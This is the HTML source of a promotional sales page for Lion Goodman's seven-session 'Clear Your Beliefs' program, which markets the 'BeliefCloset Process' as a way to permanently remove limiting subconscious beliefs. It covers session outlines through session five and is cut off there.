href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div 